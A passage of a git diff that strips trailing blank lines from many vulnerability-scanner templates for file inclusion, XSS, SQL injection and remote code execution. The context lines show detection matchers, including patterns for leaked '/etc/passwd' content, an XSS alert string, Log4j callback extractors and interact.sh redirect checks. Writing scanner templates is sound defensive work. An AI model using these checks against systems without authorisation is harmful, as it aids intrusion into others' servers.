'(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - - diff --git a/http/vulnerabilities/other/pacsone-server-lfi.yaml b/http/vulnerabilities/other/pacsone-server-lfi.yaml index 7becc54d93..8dea98c175 100644 --- a/http/vulnerabilities/other/pacsone-server-lfi.yaml +++ b/http/vulnerabilities/other/pacsone-server-lfi.yaml @@ -29,5 +29,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/parallels-hsphere-xss.yaml b/http/vulnerabilities/other/parallels-hsphere-xss.yaml index fc180911f1..b753651340 100644 --- a/http/vulnerabilities/other/parallels-hsphere-xss.yaml +++ b/http/vulnerabilities/other/parallels-hsphere-xss.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/parentlink-xss.yaml b/http/vulnerabilities/other/parentlink-xss.yaml index 1d23c1acfc..b228fb89f1 100644 --- a/http/vulnerabilities/other/parentlink-xss.yaml +++ b/http/vulnerabilities/other/parentlink-xss.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/pbootcms-database-file-download.yaml b/http/vulnerabilities/other/pbootcms-database-file-download.yaml index 521a53237a..b8df4e24d0 100644 --- a/http/vulnerabilities/other/pbootcms-database-file-download.yaml +++ b/http/vulnerabilities/other/pbootcms-database-file-download.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml b/http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml index 4a20976751..802c068cf4 100644 --- a/http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml +++ b/http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml @@ -30,5 +30,3 @@ http: regex: - "root:.*:0:0:" part: body - - diff --git a/http/vulnerabilities/other/php-timeclock-xss.yaml b/http/vulnerabilities/other/php-timeclock-xss.yaml index 1395715981..62ac31b079 100644 --- a/http/vulnerabilities/other/php-timeclock-xss.yaml +++ b/http/vulnerabilities/other/php-timeclock-xss.yaml @@ -36,5 +36,3 @@ http: words: - "text/html" part: header - - diff --git a/http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml b/http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml index 3fbf7e5677..fdfcf7e10e 100644 --- a/http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml +++ b/http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml @@ -31,5 +31,3 @@ http: part: body words: - "int(77777355556)" - - diff --git a/http/vulnerabilities/other/phpok-sqli.yaml b/http/vulnerabilities/other/phpok-sqli.yaml index ff80fc831d..98dc8cd0b7 100644 --- a/http/vulnerabilities/other/phpok-sqli.yaml +++ b/http/vulnerabilities/other/phpok-sqli.yaml @@ -31,5 +31,3 @@ http: part: body words: - '{{md5({{num}})}}' - - diff --git a/http/vulnerabilities/other/phpwiki-lfi.yaml b/http/vulnerabilities/other/phpwiki-lfi.yaml index 0e1eba6ea6..251fd4dc55 100644 --- a/http/vulnerabilities/other/phpwiki-lfi.yaml +++ b/http/vulnerabilities/other/phpwiki-lfi.yaml @@ -26,5 +26,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/pmb-directory-traversal.yaml b/http/vulnerabilities/other/pmb-directory-traversal.yaml index c9cf73a990..ba675ef7b9 100644 --- a/http/vulnerabilities/other/pmb-directory-traversal.yaml +++ b/http/vulnerabilities/other/pmb-directory-traversal.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/pmb-local-file-disclosure.yaml b/http/vulnerabilities/other/pmb-local-file-disclosure.yaml index 1a14aacf4f..d26eb3871a 100644 --- a/http/vulnerabilities/other/pmb-local-file-disclosure.yaml +++ b/http/vulnerabilities/other/pmb-local-file-disclosure.yaml @@ -28,5 +28,3 @@ http: - type: word words: - "root:x:0" - - diff --git a/http/vulnerabilities/other/pollbot-redirect.yaml b/http/vulnerabilities/other/pollbot-redirect.yaml index 3bdc8e7a37..ac4981632e 100644 --- a/http/vulnerabilities/other/pollbot-redirect.yaml +++ b/http/vulnerabilities/other/pollbot-redirect.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 301 - - diff --git a/http/vulnerabilities/other/powercreator-cms-rce.yaml b/http/vulnerabilities/other/powercreator-cms-rce.yaml index f05c09ec87..2762c69205 100644 --- a/http/vulnerabilities/other/powercreator-cms-rce.yaml +++ b/http/vulnerabilities/other/powercreator-cms-rce.yaml @@ -48,5 +48,3 @@ http: - type: dsl dsl: - "contains(body_2, '{{randstr}}') && status_code_2 == 200" - - diff --git a/http/vulnerabilities/other/processmaker-lfi.yaml b/http/vulnerabilities/other/processmaker-lfi.yaml index e27165b161..6f65cc46cd 100644 --- a/http/vulnerabilities/other/processmaker-lfi.yaml +++ b/http/vulnerabilities/other/processmaker-lfi.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/qcubed-xss.yaml b/http/vulnerabilities/other/qcubed-xss.yaml index 8788866032..057e20e1c8 100644 --- a/http/vulnerabilities/other/qcubed-xss.yaml +++ b/http/vulnerabilities/other/qcubed-xss.yaml @@ -37,5 +37,3 @@ http: part: header words: - text/html - - diff --git a/http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml b/http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml index 9e04579bdc..c7306560db 100644 --- a/http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml +++ b/http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/qihang-media-disclosure.yaml b/http/vulnerabilities/other/qihang-media-disclosure.yaml index ce7e0f25ed..da7380888b 100644 --- a/http/vulnerabilities/other/qihang-media-disclosure.yaml +++ b/http/vulnerabilities/other/qihang-media-disclosure.yaml @@ -30,5 +30,3 @@ http: - "account=" - "password=" condition: and - - diff --git a/http/vulnerabilities/other/qihang-media-lfi.yaml b/http/vulnerabilities/other/qihang-media-lfi.yaml index 18af588f46..c7428a602b 100644 --- a/http/vulnerabilities/other/qihang-media-lfi.yaml +++ b/http/vulnerabilities/other/qihang-media-lfi.yaml @@ -41,5 +41,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/rconfig-file-upload.yaml b/http/vulnerabilities/other/rconfig-file-upload.yaml index bffe29cbe6..3604834e61 100644 --- a/http/vulnerabilities/other/rconfig-file-upload.yaml +++ b/http/vulnerabilities/other/rconfig-file-upload.yaml @@ -65,5 +65,3 @@ http: - type: status status: - 302 - - diff --git a/http/vulnerabilities/other/reddittop-rss-xss.yaml b/http/vulnerabilities/other/reddittop-rss-xss.yaml index eb969b6333..f030634f99 100644 --- a/http/vulnerabilities/other/reddittop-rss-xss.yaml +++ b/http/vulnerabilities/other/reddittop-rss-xss.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/rockmongo-xss.yaml b/http/vulnerabilities/other/rockmongo-xss.yaml index f85dd300aa..6131f52d5c 100644 --- a/http/vulnerabilities/other/rockmongo-xss.yaml +++ b/http/vulnerabilities/other/rockmongo-xss.yaml @@ -39,5 +39,3 @@ http: words: - 'Content-Type: text/html' part: header - - diff --git a/http/vulnerabilities/other/sap-redirect.yaml b/http/vulnerabilities/other/sap-redirect.yaml index 640348ba24..99d07cb46a 100644 --- a/http/vulnerabilities/other/sap-redirect.yaml +++ b/http/vulnerabilities/other/sap-redirect.yaml @@ -32,5 +32,3 @@ http: - "Location: https://interact.sh" condition: or part: header - - diff --git a/http/vulnerabilities/other/sar2html-rce.yaml b/http/vulnerabilities/other/sar2html-rce.yaml index fa71962b8e..db21c04343 100644 --- a/http/vulnerabilities/other/sar2html-rce.yaml +++ b/http/vulnerabilities/other/sar2html-rce.yaml @@ -28,5 +28,3 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - diff --git a/http/vulnerabilities/other/seacms-sqli.yaml b/http/vulnerabilities/other/seacms-sqli.yaml index 773c38b1b8..3adce6cf1d 100644 --- a/http/vulnerabilities/other/seacms-sqli.yaml +++ b/http/vulnerabilities/other/seacms-sqli.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/seowon-router-rce.yaml b/http/vulnerabilities/other/seowon-router-rce.yaml index 4cfcbbe017..d27698bb7e 100644 --- a/http/vulnerabilities/other/seowon-router-rce.yaml +++ b/http/vulnerabilities/other/seowon-router-rce.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/sick-beard-xss.yaml b/http/vulnerabilities/other/sick-beard-xss.yaml index 346f95b4f5..e7e653f01c 100644 --- a/http/vulnerabilities/other/sick-beard-xss.yaml +++ b/http/vulnerabilities/other/sick-beard-xss.yaml @@ -34,5 +34,3 @@ http: words: - "text/html" part: header - - diff --git a/http/vulnerabilities/other/siteminder-dom-xss.yaml b/http/vulnerabilities/other/siteminder-dom-xss.yaml index 1324fe658f..ddafd1241b 100644 --- a/http/vulnerabilities/other/siteminder-dom-xss.yaml +++ b/http/vulnerabilities/other/siteminder-dom-xss.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/sl-studio-lfi.yaml b/http/vulnerabilities/other/sl-studio-lfi.yaml index 95db50771f..7b9e46e977 100644 --- a/http/vulnerabilities/other/sl-studio-lfi.yaml +++ b/http/vulnerabilities/other/sl-studio-lfi.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml b/http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml index 1cf49afe06..5f9db64edd 100644 --- a/http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml +++ b/http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml @@ -30,5 +30,3 @@ http: - "fonts" - "extensions" condition: and - - diff --git a/http/vulnerabilities/other/solar-log-authbypass.yaml b/http/vulnerabilities/other/solar-log-authbypass.yaml index 848a6b7beb..4d84469c0d 100644 --- a/http/vulnerabilities/other/solar-log-authbypass.yaml +++ b/http/vulnerabilities/other/solar-log-authbypass.yaml @@ -36,5 +36,3 @@ http: - " Solare Datensysteme GmbH" - "mailto:info@solar-log.com" condition: and - - diff --git a/http/vulnerabilities/other/solarview-compact-xss.yaml b/http/vulnerabilities/other/solarview-compact-xss.yaml index 5ca1cbbe9a..3cc536f9fc 100644 --- a/http/vulnerabilities/other/solarview-compact-xss.yaml +++ b/http/vulnerabilities/other/solarview-compact-xss.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml b/http/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml index 01ba96830c..9223544850 100644 --- a/http/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml +++ b/http/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/steve-xss.yaml b/http/vulnerabilities/other/steve-xss.yaml index 62e293b467..8b2e09f700 100644 --- a/http/vulnerabilities/other/steve-xss.yaml +++ b/http/vulnerabilities/other/steve-xss.yaml @@ -41,5 +41,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/surrealtodo-lfi.yaml b/http/vulnerabilities/other/surrealtodo-lfi.yaml index dea8cfc53b..04a7a569b0 100644 --- a/http/vulnerabilities/other/surrealtodo-lfi.yaml +++ b/http/vulnerabilities/other/surrealtodo-lfi.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/symantec-messaging-gateway.yaml b/http/vulnerabilities/other/symantec-messaging-gateway.yaml index a509b9cca3..89e3be533e 100644 --- a/http/vulnerabilities/other/symantec-messaging-gateway.yaml +++ b/http/vulnerabilities/other/symantec-messaging-gateway.yaml @@ -27,5 +27,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/tamronos-rce.yaml b/http/vulnerabilities/other/tamronos-rce.yaml index 3ec448ddc5..372cc9ac25 100644 --- a/http/vulnerabilities/other/tamronos-rce.yaml +++ b/http/vulnerabilities/other/tamronos-rce.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/thinkific-redirect.yaml b/http/vulnerabilities/other/thinkific-redirect.yaml index 9144983a15..807ef32f79 100644 --- a/http/vulnerabilities/other/thinkific-redirect.yaml +++ b/http/vulnerabilities/other/thinkific-redirect.yaml @@ -30,5 +30,3 @@ http: - "INSERT:" - "TABLES:" condition: and - - diff --git a/http/vulnerabilities/other/unauth-spark-api.yaml b/http/vulnerabilities/other/unauth-spark-api.yaml index 66c2cde18b..bc4a379438 100644 --- a/http/vulnerabilities/other/unauth-spark-api.yaml +++ b/http/vulnerabilities/other/unauth-spark-api.yaml @@ -31,5 +31,3 @@ http: - "serverSparkVersion" part: body condition: and - - diff --git a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml index ddabe42069..d69fbd8d4a 100644 --- a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml +++ b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml @@ -65,5 +65,3 @@ http: group: 1 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - - diff --git a/http/vulnerabilities/other/vanguard-post-xss.yaml b/http/vulnerabilities/other/vanguard-post-xss.yaml index 02fcf7f2b9..3782461d1c 100644 --- a/http/vulnerabilities/other/vanguard-post-xss.yaml +++ b/http/vulnerabilities/other/vanguard-post-xss.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/viewlinc-crlf-injection.yaml b/http/vulnerabilities/other/viewlinc-crlf-injection.yaml index f001c0fc57..2502189d55 100644 --- a/http/vulnerabilities/other/viewlinc-crlf-injection.yaml +++ b/http/vulnerabilities/other/viewlinc-crlf-injection.yaml @@ -31,5 +31,3 @@ http: - "Set-Cookie: crlfinjection=crlfinjection" part: header condition: and - - diff --git a/http/vulnerabilities/other/vpms-auth-bypass.yaml b/http/vulnerabilities/other/vpms-auth-bypass.yaml index ba9399afdd..9263946431 100644 --- a/http/vulnerabilities/other/vpms-auth-bypass.yaml +++ b/http/vulnerabilities/other/vpms-auth-bypass.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/wapples-firewall-lfi.yaml b/http/vulnerabilities/other/wapples-firewall-lfi.yaml index ac117d5b67..eee33e617a 100644 --- a/http/vulnerabilities/other/wapples-firewall-lfi.yaml +++ b/http/vulnerabilities/other/wapples-firewall-lfi.yaml @@ -43,5 +43,3 @@ http: - type: regex regex: - "root:[x*]:0:0" - - diff --git a/http/vulnerabilities/other/watchguard-credentials-disclosure.yaml b/http/vulnerabilities/other/watchguard-credentials-disclosure.yaml index 24ad95f6e5..2622a53a45 100644 --- a/http/vulnerabilities/other/watchguard-credentials-disclosure.yaml +++ b/http/vulnerabilities/other/watchguard-credentials-disclosure.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/webui-rce.yaml b/http/vulnerabilities/other/webui-rce.yaml index 93997ab5af..095b23a525 100644 --- a/http/vulnerabilities/other/webui-rce.yaml +++ b/http/vulnerabilities/other/webui-rce.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/wems-manager-xss.yaml b/http/vulnerabilities/other/wems-manager-xss.yaml index 1c5c11c83c..aff071ae74 100644 --- a/http/vulnerabilities/other/wems-manager-xss.yaml +++ b/http/vulnerabilities/other/wems-manager-xss.yaml @@ -32,5 +32,3 @@ http: words: - "text/html" part: header - - diff --git a/http/vulnerabilities/other/wuzhicms-sqli.yaml b/http/vulnerabilities/other/wuzhicms-sqli.yaml index 26df29f114..b4bef39d65 100644 --- a/http/vulnerabilities/other/wuzhicms-sqli.yaml +++ b/http/vulnerabilities/other/wuzhicms-sqli.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/xdcms-sqli.yaml b/http/vulnerabilities/other/xdcms-sqli.yaml index 0b1267c4bc..a16ec9abf1 100644 --- a/http/vulnerabilities/other/xdcms-sqli.yaml +++ b/http/vulnerabilities/other/xdcms-sqli.yaml @@ -43,5 +43,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/xerox-efi-lfi.yaml b/http/vulnerabilities/other/xerox-efi-lfi.yaml index 03f4168648..d53fafa8f8 100644 --- a/http/vulnerabilities/other/xerox-efi-lfi.yaml +++ b/http/vulnerabilities/other/xerox-efi-lfi.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/yapi-rce.yaml b/http/vulnerabilities/other/yapi-rce.yaml index 10a409433c..ce9b3e58cf 100644 --- a/http/vulnerabilities/other/yapi-rce.yaml +++ b/http/vulnerabilities/other/yapi-rce.yaml @@ -97,5 +97,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/yarn-resourcemanager-rce.yaml b/http/vulnerabilities/other/yarn-resourcemanager-rce.yaml index 9008b0954e..3186a0d47c 100644 --- a/http/vulnerabilities/other/yarn-resourcemanager-rce.yaml +++ b/http/vulnerabilities/other/yarn-resourcemanager-rce.yaml @@ -27,5 +27,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/yeswiki-sql.yaml b/http/vulnerabilities/other/yeswiki-sql.yaml index 07c511b70d..4b965f4639 100644 --- a/http/vulnerabilities/other/yeswiki-sql.yaml +++ b/http/vulnerabilities/other/yeswiki-sql.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/yeswiki-stored-xss.yaml b/http/vulnerabilities/other/yeswiki-stored-xss.yaml index 16b98cf89f..4c46f14f75 100644 --- a/http/vulnerabilities/other/yeswiki-stored-xss.yaml +++ b/http/vulnerabilities/other/yeswiki-stored-xss.yaml @@ -68,5 +68,3 @@ http: - "status_code_2 == 200" - contains(body_2, '>') condition: and - - diff --git a/http/vulnerabilities/other/yeswiki-xss.yaml b/http/vulnerabilities/other/yeswiki-xss.yaml index b6742bf55e..91e12b5790 100644 --- a/http/vulnerabilities/other/yeswiki-xss.yaml +++ b/http/vulnerabilities/other/yeswiki-xss.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/yishaadmin-lfi.yaml b/http/vulnerabilities/other/yishaadmin-lfi.yaml index 1d123f3cb6..022395ac71 100644 --- a/http/vulnerabilities/other/yishaadmin-lfi.yaml +++ b/http/vulnerabilities/other/yishaadmin-lfi.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/zcms-v3-sqli.yaml b/http/vulnerabilities/other/zcms-v3-sqli.yaml index 21772c91e5..756b7f7476 100644 --- a/http/vulnerabilities/other/zcms-v3-sqli.yaml +++ b/http/vulnerabilities/other/zcms-v3-sqli.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/zimbra-preauth-ssrf.yaml b/http/vulnerabilities/other/zimbra-preauth-ssrf.yaml index e349b78512..32c4fdd0ba 100644 --- a/http/vulnerabilities/other/zimbra-preauth-ssrf.yaml +++ b/http/vulnerabilities/other/zimbra-preauth-ssrf.yaml @@ -30,5 +30,3 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - diff --git a/http/vulnerabilities/other/zms-auth-bypass.yaml b/http/vulnerabilities/other/zms-auth-bypass.yaml index 5c78ed9726..d7186ce6fa 100644 --- a/http/vulnerabilities/other/zms-auth-bypass.yaml +++ b/http/vulnerabilities/other/zms-auth-bypass.yaml @@ -42,5 +42,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/zms-sqli.yaml b/http/vulnerabilities/other/zms-sqli.yaml index 4255de7cbe..8f58542553 100644 --- a/http/vulnerabilities/other/zms-sqli.yaml +++ b/http/vulnerabilities/other/zms-sqli.yaml @@ -42,5 +42,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/other/zzcms-xss.yaml b/http/vulnerabilities/other/zzcms-xss.yaml index a123bf80e0..b2d8dbce76 100644 --- a/http/vulnerabilities/other/zzcms-xss.yaml +++ b/http/vulnerabilities/other/zzcms-xss.yaml @@ -38,5 +38,3 @@ http: - "status_code_2 == 200" - 'contains(body_2, "参数 1\"+alert(document.domain)+")' condition: and - - diff --git a/http/vulnerabilities/portainer-init-deploy.yaml b/http/vulnerabilities/portainer-init-deploy.yaml index 44a6a988be..1db4444292 100644 --- a/http/vulnerabilities/portainer-init-deploy.yaml +++ b/http/vulnerabilities/portainer-init-deploy.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 404 - - diff --git a/http/vulnerabilities/rails/rails6-xss.yaml b/http/vulnerabilities/rails/rails6-xss.yaml index db7dded862..7554f52772 100644 --- a/http/vulnerabilities/rails/rails6-xss.yaml +++ b/http/vulnerabilities/rails/rails6-xss.yaml @@ -37,5 +37,3 @@ http: - 'text/html' part: header condition: and - - diff --git a/http/vulnerabilities/rocketchat/unauth-message-read.yaml b/http/vulnerabilities/rocketchat/unauth-message-read.yaml index 07f297824b..e624e84ae7 100644 --- a/http/vulnerabilities/rocketchat/unauth-message-read.yaml +++ b/http/vulnerabilities/rocketchat/unauth-message-read.yaml @@ -49,4 +49,3 @@ http: - type: status status: - 200 - diff --git a/http/vulnerabilities/royalevent/royalevent-management-xss.yaml b/http/vulnerabilities/royalevent/royalevent-management-xss.yaml index dee10cb1f8..d89e0109ce 100644 --- a/http/vulnerabilities/royalevent/royalevent-management-xss.yaml +++ b/http/vulnerabilities/royalevent/royalevent-management-xss.yaml @@ -75,5 +75,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/royalevent/royalevent-stored-xss.yaml b/http/vulnerabilities/royalevent/royalevent-stored-xss.yaml index 921a0aad7a..62fd4ba197 100644 --- a/http/vulnerabilities/royalevent/royalevent-stored-xss.yaml +++ b/http/vulnerabilities/royalevent/royalevent-stored-xss.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 302 - - diff --git a/http/vulnerabilities/ruijie-eg-login-rce.yaml b/http/vulnerabilities/ruijie-eg-login-rce.yaml index 0d2164759a..2788a0be5d 100644 --- a/http/vulnerabilities/ruijie-eg-login-rce.yaml +++ b/http/vulnerabilities/ruijie-eg-login-rce.yaml @@ -49,5 +49,3 @@ http: group: 1 regex: - 'admin ([a-zA-Z0-9#@]+)",' - - diff --git a/http/vulnerabilities/ruijie/ruijie-eg-rce.yaml b/http/vulnerabilities/ruijie/ruijie-eg-rce.yaml index ef44fc8b7e..647bf6f176 100644 --- a/http/vulnerabilities/ruijie/ruijie-eg-rce.yaml +++ b/http/vulnerabilities/ruijie/ruijie-eg-rce.yaml @@ -59,5 +59,3 @@ http: internal: true regex: - 'admin ([a-zA-Z0-9#@]+)",' - - diff --git a/http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml b/http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml index 41de3ef327..28c6174f38 100644 --- a/http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml +++ b/http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml b/http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml index 03fb2cbe57..66640dab6e 100644 --- a/http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml +++ b/http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml b/http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml index c1fd675554..f5b791fc7d 100644 --- a/http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml +++ b/http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml b/http/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml index f5213b1dd1..3563ec9ff7 100644 --- a/http/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml +++ b/http/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml @@ -35,5 +35,3 @@ http: words: - "text/html" part: header - - diff --git a/http/vulnerabilities/sangfor/sangfor-ba-rce.yaml b/http/vulnerabilities/sangfor/sangfor-ba-rce.yaml index 66927a1900..10b461e236 100644 --- a/http/vulnerabilities/sangfor/sangfor-ba-rce.yaml +++ b/http/vulnerabilities/sangfor/sangfor-ba-rce.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml b/http/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml index 53c07e2917..6b46e72082 100644 --- a/http/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml +++ b/http/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml @@ -41,5 +41,3 @@ http: - type: status status: - 302 - - diff --git a/http/vulnerabilities/sangfor/sangfor-edr-rce.yaml b/http/vulnerabilities/sangfor/sangfor-edr-rce.yaml index 46cce31793..a81243c8a0 100644 --- a/http/vulnerabilities/sangfor/sangfor-edr-rce.yaml +++ b/http/vulnerabilities/sangfor/sangfor-edr-rce.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/seeyon/wooyun-2015-148227.yaml b/http/vulnerabilities/seeyon/wooyun-2015-148227.yaml index 07e0ae222f..98b3d861c2 100644 --- a/http/vulnerabilities/seeyon/wooyun-2015-148227.yaml +++ b/http/vulnerabilities/seeyon/wooyun-2015-148227.yaml @@ -32,5 +32,3 @@ http: part: header words: - "application/xml" - - diff --git a/http/vulnerabilities/seeyon/zhiyuan-file-upload.yaml b/http/vulnerabilities/seeyon/zhiyuan-file-upload.yaml index afe4ecae3b..8b7e1b3410 100644 --- a/http/vulnerabilities/seeyon/zhiyuan-file-upload.yaml +++ b/http/vulnerabilities/seeyon/zhiyuan-file-upload.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml b/http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml index 78a6bc133e..b645b42031 100644 --- a/http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml +++ b/http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml @@ -36,5 +36,3 @@ http: words: - "text/html" part: header - - diff --git a/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml b/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml index c8bf8a8b44..f54644342f 100644 --- a/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml +++ b/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml @@ -41,5 +41,3 @@ http: part: body words: - '"spring.datasource.hikari.connection-test-query":"CREATE ALIAS EXEC AS CONCAT' - - diff --git a/http/vulnerabilities/springboot/springboot-log4j-rce.yaml b/http/vulnerabilities/springboot/springboot-log4j-rce.yaml index 1d3c5fcfea..f5ea06b7dd 100644 --- a/http/vulnerabilities/springboot/springboot-log4j-rce.yaml +++ b/http/vulnerabilities/springboot/springboot-log4j-rce.yaml @@ -59,5 +59,3 @@ http: group: 1 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - - diff --git a/http/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml b/http/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml index f1f3debc32..213f1ab3e3 100644 --- a/http/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml +++ b/http/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml @@ -35,5 +35,3 @@ http: part: header words: - "text/html" - - diff --git a/http/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml b/http/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml index 103e853b2d..fecd0db181 100644 --- a/http/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml +++ b/http/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml b/http/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml index 6f3be1b59c..acbe8921fa 100644 --- a/http/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml +++ b/http/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml @@ -35,5 +35,3 @@ http: words: - "text/html" part: header - - diff --git a/http/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml b/http/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml index 